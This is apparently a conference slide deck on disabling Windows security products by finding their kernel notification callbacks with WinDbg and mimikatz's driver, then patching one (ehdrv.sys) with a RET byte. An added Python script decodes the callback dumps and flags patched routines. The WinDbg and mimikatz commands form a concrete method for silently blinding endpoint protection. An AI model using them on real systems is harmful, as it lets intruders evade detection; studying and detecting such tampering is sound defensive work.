Slide 1: Killing any security product … using a Mimikatz undocumented feature
@newsoft

Slide 2: How to write a security product for Windows?
“There is only one way to do it” … since Windows Vista

Slide 3: How to write a security product for Windows?
ObRegisterCallbacks (object handles)
PsSetCreateProcessNotifyRoutine (process)
PsSetCreateProcessNotifyRoutineEx
PsSetCreateThreadNotifyRoutine (thread)
PsSetCreateThreadNotifyRoutineEx
PsSetLoadImageNotifyRoutine (image load)
CmRegisterCallback (registry)
CmRegisterCallbackEx
FltRegisterFilter (file)
FltStartFiltering
Slide 4: Finding process callbacks with WinDbg
kd> dd nt!PspCreateProcessNotifyRoutineCount l1
fffff800`02a821a4 00000005
kd> dd nt!PspCreateProcessNotifyRoutineExCount l1
fffff800`02a821a0 00000002
kd> dp nt!PspCreateProcessNotifyRoutine l8
fffff800`02a81fa0 fffff8a0`00008d6f fffff8a0`001b79ff
fffff800`02a81fb0 fffff8a0`002e784f fffff8a0`002e7bff
fffff800`02a81fc0 fffff8a0`003f295f fffff8a0`001dc53f
fffff800`02a81fd0 fffff8a0`031ef24f 00000000`00000000
Five routines registered through PsSetCreateProcessNotifyRoutine plus two through the Ex variant account for the seven non-null slots. The slots are not raw function pointers: each one is an EX_FAST_REF (the low 4 bits cache a reference count, hence the trailing f) which, with those bits cleared, points to an EX_CALLBACK_ROUTINE_BLOCK whose second field is the driver's actual routine.

Slide 5: Other callbacks
kd> dd nt!PspCreateThreadNotifyRoutineCount l1      <<< Thread
fffff800`02a81f80 00000000
kd> dd nt!PspLoadImageNotifyRoutineCount l1         <<< Image load
fffff800`02a81d60 00000002
kd> dp nt!PspLoadImageNotifyRoutine l3
fffff800`02a81d20 fffff8a0`000927ef fffff8a0`002a23cf
fffff800`02a81d30 00000000`00000000
kd> dd nt!CmpCallBackCount l1                       <<< Registry
fffff800`02a63b04 00000001
kd> x nt!CallbackListHead
fffff800`02ad8970 nt!CallbackListHead = <no type information>
No thread callback is registered on this machine, two image-load callbacks are, and there is one registry callback. Registry callbacks are kept in a linked list rather than an array, so x only gives the address of the list head; the callbacks themselves are the LIST_ENTRY chain hanging off it, which is the kind of manual walking the next slide wants to avoid.
Slide 6: We need automation!
Enter Mimikatz magic ...

Slide 7: Magic command #1
mimikatz # !+
[*] mimikatz driver not present
[+] mimikatz driver successfully registered
[+] mimikatz driver ACL to everyone
[+] mimikatz driver started
!+ installs and starts mimikatz's own kernel driver (mimidrv), so it needs the rights to load a driver in the first place. Note the third line: the driver's device is opened up to every user on the box, so unload it with !- as soon as the enumeration is done.
Slide 8: Magic command #2
mimikatz # !notifObject
...
* Process
* Callback [type 3]
PreOperation : 0xFFFFF880035B66E0 [ehdrv.sys + 0x0001c6e0]
Open - 0xFFFFF80002D9D300 [ntoskrnl.exe + 0x00348300]
Close - 0xFFFFF80002D83010 [ntoskrnl.exe + 0x0032e010]
Delete - 0xFFFFF80002D822C0 [ntoskrnl.exe + 0x0032d2c0]
Security - 0xFFFFF80002DB52A0 [ntoskrnl.exe + 0x003602a0]
...
!notifObject lists the ObRegisterCallbacks registrations per object type, with every address already attributed to its module. Everything shown for the Process type except the PreOperation entry is ntoskrnl's own object-type procedure; the single address inside ehdrv.sys is the security product's callback, and that is the one to go after. The same driver has equivalent listings for the callback types of slides 4 and 5 (!notifProcess, !notifThread, !notifImage, !notifReg).
Slide 9: Back in WinDbg
kd> e ehdrv+0x0001c6e0 c3
0xC3 == RET opcode
After this patch, the notification callback will do nothing
ehdrv+0x0001c6e0 is the PreOperation routine found on the previous slide; e writes the single byte, so the routine now returns before touching the operation information and the kernel completes the handle operation as if nothing had been registered, while ObRegisterCallbacks still has the callback on its list. The cost is that any integrity check over the driver's code in memory sees the modified byte.
Unlinking from the callbacks list is also doable
● Requires more work ...
● … but is less detectable (no code alteration)
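The following is an added example, not code from the slides or from mimikatz: a small Python script that parses the dp dumps from slides 4 and 5, decodes each slot as an EX_FAST_REF, checks the slot usage against the Count values, attributes routine addresses to modules the way slide 8's !notifObject output prints "module + offset", and flags a routine whose first byte is already 0xC3 (slide 9). The dump text is copied from the slides; the module base addresses are back-computed from slide 8's address/offset pairs, and the module sizes are assumptions.

```python
"""Decode WinDbg callback dumps and attribute callback routines to modules.

Added example; the dumps are constructed copies of the slide output, the module
bases are derived from slide 8's "module + offset" pairs, the sizes are assumed.
"""
import re

# Constructed input: `dp nt!PspCreateProcessNotifyRoutine l8` (slide 4).
DP_PROCESS = """\
fffff800`02a81fa0 fffff8a0`00008d6f fffff8a0`001b79ff
fffff800`02a81fb0 fffff8a0`002e784f fffff8a0`002e7bff
fffff800`02a81fc0 fffff8a0`003f295f fffff8a0`001dc53f
fffff800`02a81fd0 fffff8a0`031ef24f 00000000`00000000
"""
PROCESS_COUNT, PROCESS_EX_COUNT = 5, 2      # the two `dd ... Count l1` values (slide 4)

# Constructed input: `dp nt!PspLoadImageNotifyRoutine l3` (slide 5).
DP_IMAGE = """\
fffff800`02a81d20 fffff8a0`000927ef fffff8a0`002a23cf
fffff800`02a81d30 00000000`00000000
"""
IMAGE_COUNT = 2

# Constructed module table: bases derived from slide 8, sizes are assumptions.
MODULES = [
    ("ntoskrnl.exe", 0xFFFFF80002D9D300 - 0x00348300, 0x600000),
    ("ehdrv.sys",    0xFFFFF880035B66E0 - 0x0001C6E0, 0x40000),
]

QWORD = re.compile(r"[0-9a-f]{8}`[0-9a-f]{8}")
RET = 0xC3


def parse_dp(text):
    """Values of a 64-bit `dp` dump; the first token of each line is the address column."""
    values = []
    for line in text.splitlines():
        tokens = QWORD.findall(line)
        values.extend(int(t.replace("`", ""), 16) for t in tokens[1:])
    return values


def decode_ex_fast_ref(value):
    """The PspCreate*NotifyRoutine slots are EX_FAST_REF values: the low 4 bits cache a
    reference count, the rest points to an EX_CALLBACK_ROUTINE_BLOCK (on x64 the driver's
    routine is the pointer at +8 inside that block, so one more dereference is needed)."""
    return value & ~0xF, value & 0xF


def live_callback_blocks(text):
    """Non-empty slots as (block_address, refcount)."""
    return [decode_ex_fast_ref(v) for v in parse_dp(text) if v != 0]


def counts_are_consistent(text, *counts):
    """Sanity check before trusting the counters: used slots must equal the sum of the Count symbols."""
    return len(live_callback_blocks(text)) == sum(counts)


def resolve(address, modules=MODULES):
    """Map a kernel address to ('module', offset) the way !notifObject prints it; None if unknown."""
    for name, base, size in modules:
        if base <= address < base + size:
            return name, address - base
    return None


def third_party_callbacks(routines, modules=MODULES):
    """Routine addresses that do not live in ntoskrnl.exe, i.e. the security product's own code."""
    hits = []
    for addr in routines:
        where = resolve(addr, modules)
        if where is None or where[0].lower() != "ntoskrnl.exe":
            hits.append((addr, where))
    return hits


def is_ret_patched(db_line):
    """True when the first byte shown by `db <routine> l1` is the RET opcode (slide 9's patch)."""
    first_byte = db_line.split()[1]
    return int(first_byte, 16) == RET


if __name__ == "__main__":
    print("process slots used:", len(live_callback_blocks(DP_PROCESS)),
          "consistent:", counts_are_consistent(DP_PROCESS, PROCESS_COUNT, PROCESS_EX_COUNT))
    print("image slots used:", len(live_callback_blocks(DP_IMAGE)),
          "consistent:", counts_are_consistent(DP_IMAGE, IMAGE_COUNT))
    slide8 = [0xFFFFF880035B66E0, 0xFFFFF80002D9D300, 0xFFFFF80002D83010,
              0xFFFFF80002D822C0, 0xFFFFF80002DB52A0]
    for addr, where in third_party_callbacks(slide8):
        print("third-party callback: 0x%016X %s" % (addr, where))
    # Constructed `db` line as it would look after slide 9's `e ... c3`.
    print("patched:", is_ret_patched("fffff880`035b66e0  c3"))
```

The counter check is the part worth keeping around: on slide 4 the five plain and two Ex registrations add up to exactly the seven non-null slots, so a dump where they do not is the first hint that something has been unlinked by hand.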
Slide 10: Conclusion
Cons
● You need kernel write access
○ Being able to write a single byte (even a NULL byte) is enough, though
Pros
● Will kill any security tool
● The software will still be “active and running” from a monitoring point of view, just not being notified

Uploaded to SlideShare by ssuser372a10, Feb. 2, 2017
